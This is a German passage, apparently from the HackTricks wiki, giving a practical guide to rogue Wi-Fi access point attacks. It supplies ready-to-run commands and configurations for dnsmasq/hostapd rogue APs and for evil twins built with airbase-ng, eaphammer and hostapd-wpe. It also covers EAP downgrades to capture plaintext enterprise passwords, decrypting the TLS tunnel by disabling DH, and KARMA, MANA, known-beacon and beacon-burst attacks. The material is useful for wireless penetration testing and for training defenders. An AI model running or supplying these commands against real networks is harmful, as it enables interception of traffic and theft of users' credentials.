  • Das Wissen über die PNL eines Geräts ermöglicht potenzielle Ausnutzung, indem ein bekanntes Netzwerk-ESSID nachgeahmt wird, um das Gerät dazu zu bringen, sich mit einem Rogue-AP zu verbinden.

Aktives Sondieren

  • Aktives Sondieren beinhaltet, dass Stationen Sondierungsanfragen senden, um nahegelegene APs und deren Eigenschaften zu entdecken.
  • Gerichtete Sondierungsanfragen zielen auf eine bestimmte ESSID ab und helfen dabei festzustellen, ob ein bestimmtes Netzwerk in Reichweite ist, auch wenn es sich um ein verstecktes Netzwerk handelt.
  • Rundfunk-Sondierungsanfragen haben ein leeres SSID-Feld und werden an alle nahegelegenen APs gesendet, sodass die Station nach bevorzugten Netzwerken suchen kann, ohne den Inhalt ihrer PNL preiszugeben.

Einfacher AP mit Umleitung zum Internet

Bevor erklärt wird, wie komplexere Angriffe durchgeführt werden, wird erklärt, wie man einfach einen AP erstellt und seinen Datenverkehr auf eine mit dem Internet verbundene Schnittstelle umleitet.

Überprüfen Sie mit ifconfig -a, ob die WLAN-Schnittstelle zum Erstellen des AP und die mit dem Internet verbundene Schnittstelle vorhanden sind.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

Erstellen Sie die Konfigurationsdatei /etc/dnsmasq.conf:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Dann IP-Adressen und Routen setzen:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Und dann starte dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Erstellen Sie eine Konfigurationsdatei hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Stoppen Sie lästige Prozesse, setzen Sie den Monitor-Modus und starten Sie hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Weiterleitung und Umleitung

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Böser Zwilling

Ein böser Zwilling-Angriff nutzt die Art und Weise aus, wie WiFi-Clients Netzwerke erkennen, wobei sie sich hauptsächlich auf den Netzwerknamen (ESSID) verlassen, ohne dass sich der Basisstation (Zugriffspunkt) beim Client authentifizieren muss. Die wichtigsten Punkte sind:

  • Schwierigkeiten bei der Unterscheidung: Geräte haben Schwierigkeiten, zwischen legitimen und gefälschten Zugriffspunkten zu unterscheiden, wenn sie denselben ESSID und Verschlüsselungstyp teilen. Netzwerke in der realen Welt verwenden oft mehrere Zugriffspunkte mit demselben ESSID, um die Abdeckung nahtlos zu erweitern.

  • Client-Roaming und Verbindungsm manipulation: Das 802.11-Protokoll ermöglicht es Geräten, zwischen Zugriffspunkten innerhalb desselben ESS zu wechseln. Angreifer können dies ausnutzen, indem sie ein Gerät dazu verleiten, sich von seinem aktuellen Zugriffspunkt zu trennen und sich mit einem gefälschten zu verbinden. Dies kann erreicht werden, indem ein stärkeres Signal angeboten wird oder die Verbindung zum legitimen Zugriffspunkt durch Methoden wie Deauthentifizierungspakete oder Jamming gestört wird.

  • Herausforderungen bei der Ausführung: Das erfolgreiche Ausführen eines bösen Zwilling-Angriffs in Umgebungen mit mehreren gut platzierten Zugriffspunkten kann herausfordernd sein. Das Deauthentifizieren eines einzelnen legitimen Zugriffspunkts führt oft dazu, dass das Gerät sich mit einem anderen legitimen Zugriffspunkt verbindet, es sei denn, der Angreifer kann alle nahegelegenen Zugriffspunkte deauthentifizieren oder den gefälschten Zugriffspunkt strategisch platzieren.

Sie können einen sehr einfachen Open Evil Twin erstellen (ohne die Fähigkeit, den Datenverkehr ins Internet zu leiten) durch:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

Sie können auch einen Evil Twin mit eaphammer erstellen (beachten Sie, dass für die Erstellung von Evil Twins mit eaphammer die Schnittstelle NICHT im Monitor-Modus sein sollte):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Oder mit Airgeddon: Optionen: 5,6,7,8,9 (im Menü für den Evil Twin-Angriff).

Bitte beachten Sie, dass standardmäßig, wenn ein ESSID in der PNL als WPA-geschützt gespeichert ist, das Gerät nicht automatisch eine Verbindung zu einem offenen Evil Twin herstellt. Sie können versuchen, den echten AP zu DoS-en und hoffen, dass der Benutzer manuell eine Verbindung zu Ihrem offenen Evil Twin herstellt, oder Sie könnten den echten AP DoS-en und einen WPA Evil Twin verwenden, um den Handshake zu erfassen (mit dieser Methode können Sie das Opfer nicht dazu bringen, sich mit Ihnen zu verbinden, da Sie den PSK nicht kennen, aber Sie können den Handshake erfassen und versuchen, ihn zu knacken).

Einige Betriebssysteme und Antivirenprogramme warnen den Benutzer davor, sich mit einem offenen Netzwerk zu verbinden, da dies gefährlich ist...

WPA/WPA2 Evil Twin

Sie können einen Evil Twin mit WPA/2 erstellen, und wenn die Geräte so konfiguriert sind, dass sie sich mit diesem SSID mit WPA/2 verbinden, werden sie versuchen, eine Verbindung herzustellen. Wie auch immer, um den 4-Wege-Handshake abzuschließen, müssen Sie auch das Passwort kennen, das der Client verwenden wird. Wenn Sie es nicht wissen, wird die Verbindung nicht abgeschlossen.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Unternehmens-Evil-Twin

Um diese Angriffe zu verstehen, empfehle ich, zuerst die kurze WPA Enterprise Erklärung zu lesen.

Verwendung von hostapd-wpe

hostapd-wpe benötigt eine Konfigurationsdatei, um zu funktionieren. Um die Generierung dieser Konfigurationen zu automatisieren, könnten Sie https://github.com/WJDigby/apd_launchpad verwenden (laden Sie die Python-Datei in /etc/hostapd-wpe/ herunter).

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Im Konfigurationsfile können verschiedene Dinge wie SSID, Kanal, Benutzerdateien, Zertifikat/Schlüssel, DH-Parameter, WPA-Version und Authentifizierung ausgewählt werden.

Verwenden von hostapd-wpe mit EAP-TLS, um jedem Zertifikat die Anmeldung zu ermöglichen.

Verwendung von EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Standardmäßig verwendet EAPHammer diese Authentifizierungsmethoden (beachten Sie GTC als erste Methode, um Klartextpasswörter zu erhalten, und dann die Verwendung robusterer Authentifizierungsmethoden):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Dies ist die Standardmethodik, um lange Verbindungsziten zu vermeiden. Sie können jedoch auch angeben, dass der Server die Authentifizierungsmethoden von schwächsten bis stärksten durchläuft:

--negotiate weakest

Oder Sie könnten auch verwenden:

  • --negotiate gtc-downgrade um eine hoch effiziente GTC-Downgrade-Implementierung zu verwenden (Klartextpasswörter)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP um manuell die angebotenen Methoden festzulegen (das Angebot der gleichen Authentifizierungsmethoden in der gleichen Reihenfolge wie die Organisation, die angegriffen wird, wird die Erkennung des Angriffs viel schwieriger machen).
  • Weitere Informationen finden Sie im Wiki

Mit Airgeddon

Airgeddon kann zuvor generierte Zertifikate verwenden, um EAP-Authentifizierung für WPA/WPA2-Enterprise-Netzwerke anzubieten. Das gefälschte Netzwerk wird das Verbindungsprotokoll auf EAP-MD5 herabstufen, um den Benutzer und das MD5 des Passworts zu erfassen. Später kann der Angreifer versuchen, das Passwort zu knacken.
Airggedon bietet Ihnen die Möglichkeit eines kontinuierlichen Evil Twin-Angriffs (lautstark) oder nur den Evil-Angriff zu erstellen, bis sich jemand verbindet (sanft).

Debuggen von PEAP- und EAP-TTLS-TLS-Tunneln bei Evil Twins-Angriffen

Dieser Methode wurde bei einer PEAP-Verbindung getestet, aber da ich einen beliebigen TLS-Tunnel entschlüssele, sollte dies auch mit EAP-TTLS funktionieren.

Im Konfiguration von hostapd-wpe kommentieren Sie die Zeile, die dh_file enthält (von dh_file=/etc/hostapd-wpe/certs/dh zu #dh_file=/etc/hostapd-wpe/certs/dh)
Dadurch wird hostapd-wpe dazu gebracht, Schlüssel mit RSA auszutauschen anstelle von DH, sodass Sie den Datenverkehr später entschlüsseln können, indem Sie den privaten Schlüssel des Servers kennen.

Starten Sie nun den Evil Twin mit hostapd-wpe mit dieser modifizierten Konfiguration wie gewohnt. Starten Sie auch wireshark auf der Schnittstelle, die den Evil Twin-Angriff durchführt.

Jetzt oder später (wenn Sie bereits einige Authentifizierungsabsichten erfasst haben) können Sie den privaten RSA-Schlüssel zu Wireshark hinzufügen unter: Bearbeiten --> Einstellungen --> Protokolle --> TLS --> (RSA-Schlüsselliste) Bearbeiten...

Fügen Sie einen neuen Eintrag hinzu und füllen Sie das Formular mit diesen Werten aus: IP-Adresse = beliebig -- Port = 0 -- Protokoll = Daten -- Schlüsseldatei (wählen Sie Ihre Schlüsseldatei aus, um Probleme zu vermeiden, wählen Sie eine Schlüsseldatei ohne Passwortschutz).

Und schauen Sie sich den neuen "Entschlüsselten TLS"-Tab an:

KARMA, MANA, Loud MANA und Known Beacons-Angriff

ESSID- und MAC-Black-/Whitelisten

Verschiedene Arten von Media Access Control Filter Lists (MFACLs) und ihre entsprechenden Modi und Auswirkungen auf das Verhalten eines Rogue Access Points (AP):

  1. MAC-basierte Whitelist:
  • Der Rogue-AP antwortet nur auf Anforderungen von Geräten, die in der Whitelist aufgeführt sind, und bleibt für alle anderen unsichtbar.
  1. MAC-basierte Blacklist:
  • Der Rogue-AP ignoriert Anforderungen von Geräten auf der Blacklist und macht den Rogue-AP effektiv für diese spezifischen Geräte unsichtbar.
  1. ESSID-basierte Whitelist:
  • Der Rogue-AP antwortet nur auf Anforderungen für bestimmte ESSIDs in der Liste und bleibt für Geräte unsichtbar, deren Preferred Network Lists (PNLs) diese ESSIDs nicht enthalten.
  1. ESSID-basierte Blacklist:
  • Der Rogue-AP antwortet nicht auf Anforderungen für die spezifischen ESSIDs in der Blacklist und bleibt für Geräte unsichtbar, die nach diesen bestimmten Netzwerken suchen.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Diese Methode ermöglicht es einem Angreifer, einen bösartigen Zugriffspunkt (AP) zu erstellen, der auf alle Sondieranfragen von Geräten antwortet, die sich mit Netzwerken verbinden möchten. Diese Technik täuscht Geräte, um sich mit dem AP des Angreifers zu verbinden, indem sie die Netzwerke nachahmt, nach denen die Geräte suchen. Sobald ein Gerät eine Verbindungsanfrage an diesen Rogue-AP sendet, wird die Verbindung hergestellt, was dazu führt, dass das Gerät fälschlicherweise mit dem Netzwerk des Angreifers verbunden ist.

MANA

Dann begannen Geräte, unerwünschte Netzwerkantworten zu ignorieren, was die Wirksamkeit des ursprünglichen Karma-Angriffs verringerte. Allerdings wurde eine neue Methode, bekannt als der MANA-Angriff, von Ian de Villiers und Dominic White eingeführt. Diese Methode beinhaltet, dass der Rogue-AP die Preferred Network Lists (PNL) von Geräten erfasst, indem er auf deren Rundfunk-Sondieranfragen reagiert und Netzwerknamen (SSIDs) sendet, die zuvor von den Geräten angefordert wurden. Dieser ausgefeilte Angriff umgeht die Schutzmechanismen gegen den ursprünglichen Karma-Angriff, indem er ausnutzt, wie Geräte bekannte Netzwerke speichern und priorisieren.

Der MANA-Angriff funktioniert, indem er sowohl gerichtete als auch Rundfunk-Sondieranfragen von Geräten überwacht. Bei gerichteten Anfragen werden die MAC-Adresse des Geräts und der angeforderte Netzwerkname aufgezeichnet und diese Informationen einer Liste hinzugefügt. Wenn eine Rundfunkanfrage empfangen wird, antwortet der AP mit Informationen, die zu einem der Netzwerke auf der Liste des Geräts passen, um das Gerät dazu zu verleiten, sich mit dem Rogue-AP zu verbinden.

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Lauter MANA

Ein Lauter MANA-Angriff ist eine fortgeschrittene Strategie, wenn Geräte keine gerichteten Sondierungen verwenden oder wenn ihre bevorzugten Netzwerklisten (PNL) dem Angreifer unbekannt sind. Er basiert auf dem Prinzip, dass Geräte im selben Bereich wahrscheinlich einige Netzwerknamen in ihren PNLs teilen. Anstatt selektiv zu antworten, sendet dieser Angriff Sondierungsantworten für jeden Netzwerknamen (ESSID) aus, der in den kombinierten PNLs aller beobachteten Geräte gefunden wird. Dieser breite Ansatz erhöht die Wahrscheinlichkeit, dass ein Gerät ein vertrautes Netzwerk erkennt und versucht, sich mit dem Rogue Access Point (AP) zu verbinden.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Bekannter Beacon-Angriff

Wenn der Loud MANA-Angriff nicht ausreicht, bietet der Bekannte Beacon-Angriff einen anderen Ansatz. Diese Methode erzwingt den Verbindungsprozess, indem sie einen AP simuliert, der auf jeden Netzwerknamen antwortet, indem sie eine Liste potenzieller ESSIDs aus einem Wordlist durchläuft. Dies simuliert die Anwesenheit zahlreicher Netzwerke in der Hoffnung, eine ESSID im PNL des Opfers abzugleichen, was einen Verbindungsversuch mit dem gefälschten AP auslöst. Der Angriff kann verstärkt werden, indem er mit der Option --loud kombiniert wird, um einen aggressiveren Versuch zu unternehmen, Geräte zu fangen.

Eaphammer hat diesen Angriff als MANA-Angriff implementiert, bei dem alle ESSIDs in einer Liste aufgeladen werden (Sie könnten dies auch mit --loud kombinieren, um einen Loud MANA + Bekannte Beacons-Angriff zu erstellen):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Bekannter Beacon Burst Angriff

Der bekannte Beacon Burst Angriff beinhaltet das schnelle und kontinuierliche Aussenden von Beacon Frames für jede in einer Datei aufgeführte ESSID. Dies schafft eine dichte Umgebung aus gefälschten Netzwerken und erhöht erheblich die Wahrscheinlichkeit, dass Geräte mit dem Rogue AP verbunden werden, insbesondere in Kombination mit einem MANA Angriff. Diese Technik nutzt Geschwindigkeit und Menge, um die Netzwerkauswahlmechanismen der Geräte zu überlasten.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct ist ein Protokoll, das es Geräten ermöglicht, direkt miteinander über Wi-Fi zu verbinden, ohne die Notwendigkeit eines herkömmlichen drahtlosen Zugangspunkts. Diese Fähigkeit ist in verschiedene Internet of Things (IoT)-Geräte integriert, wie Drucker und Fernseher, und erleichtert die direkte Geräte-zu-Geräte-Kommunikation. Ein bemerkenswertes Merkmal von Wi-Fi Direct ist, dass ein Gerät die Rolle eines Zugangspunkts übernimmt, bekannt als der Gruppenbesitzer, um die Verbindung zu verwalten.

Die Sicherheit für Wi-Fi Direct-Verbindungen wird durch Wi-Fi Protected Setup (WPS) hergestellt, das verschiedene Methoden für sicheres Pairing unterstützt, einschließlich:

  • Push-Button Configuration (PBC)
  • PIN-Eingabe
  • Near-Field Communication (NFC)

Diese Methoden, insbesondere die PIN-Eingabe, sind anfällig für die gleichen Schwachstellen wie WPS in herkömmlichen Wi-Fi-Netzwerken, was sie zu Zielen für ähnliche Angriffsvektoren macht.

EvilDirect Hijacking

EvilDirect Hijacking ist ein Angriff, der spezifisch für Wi-Fi Direct ist. Er spiegelt das Konzept eines Evil Twin-Angriffs wider, zielt jedoch auf Wi-Fi Direct-Verbindungen ab. In diesem Szenario gibt sich ein Angreifer als legitimer Gruppenbesitzer aus, mit dem Ziel, Geräte dazu zu bringen, sich mit einer bösartigen Entität zu verbinden. Diese Methode kann mithilfe von Tools wie airbase-ng ausgeführt werden, indem der Kanal, die ESSID und die MAC-Adresse des imitierten Geräts angegeben werden:

Referenzen

TODO: Werfen Sie einen Blick auf https://github.com/wifiphisher/wifiphisher (Anmeldung mit Facebook und Nachahmung von WPA in Captive Portals)

Treten Sie dem HackenProof Discord Server bei, um mit erfahrenen Hackern und Bug-Bounty-Jägern zu kommunizieren!

Hacking Insights
Beschäftigen Sie sich mit Inhalten, die sich mit dem Nervenkitzel und den Herausforderungen des Hackens befassen

Echtzeit-Hack-News
Bleiben Sie mit der schnelllebigen Hacking-Welt durch Echtzeit-Nachrichten und Einblicke auf dem Laufenden

Neueste Ankündigungen
Bleiben Sie über die neuesten Bug-Bounties und wichtige Plattform-Updates informiert

Treten Sie uns bei auf Discord und beginnen Sie noch heute mit Top-Hackern zusammenzuarbeiten!

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: